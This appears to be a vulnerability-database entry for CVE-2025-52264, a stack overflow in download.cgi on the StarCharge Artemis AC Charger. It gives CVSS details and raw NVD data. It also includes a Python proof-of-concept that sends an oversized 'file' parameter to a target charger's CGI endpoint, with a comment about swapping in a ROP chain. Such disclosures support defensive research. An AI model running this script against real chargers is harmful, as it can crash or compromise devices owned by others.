Security Vulnerability Report
中文
CVE-2025-52264 CVSS 8.0 HIGH

CVE-2025-52264

Published: 2025-10-27 15:15:39
Last Modified: 2026-04-15 00:35:42

Description

StarCharge Artemis AC Charger 7-22 kW v1.0.4 was discovered to contain a stack overflow via the cgiMain function at download.cgi.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

StarCharge Artemis AC Charger 7-22 kW v1.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-52264 PoC - StarCharge Artemis AC Charger Stack Overflow # Target: download.cgi cgiMain function import requests import sys def exploit(target_ip, target_port=80): """ Exploit for CVE-2025-52264 Stack overflow in download.cgi cgiMain function """ # Stack overflow payload - 1000 bytes of 'A' to overflow return address # In real exploitation, replace with actual ROP chain payload = "A" * 1000 # Target endpoint url = f"http://{target_ip}:{target_port}/cgi-bin/download.cgi" # Malicious parameters that trigger overflow params = { "file": payload, "action": "download" } print(f"[*] Sending exploit payload to {url}") print(f"[*] Payload length: {len(payload)} bytes") try: response = requests.get(url, params=params, timeout=10) print(f"[+] Request sent - Status: {response.status_code}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52264", "sourceIdentifier": "[email protected]", "published": "2025-10-27T15:15:38.637", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "StarCharge Artemis AC Charger 7-22 kW v1.0.4 was discovered to contain a stack overflow via the cgiMain function at download.cgi."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "references": [{"url": "https://github.com/HaToan/CVEs/blob/main/starcharge/README.md", "source": "[email protected]"}, {"url": "https://www.starcharge.com/product/artemis/", "source": "[email protected]"}]}}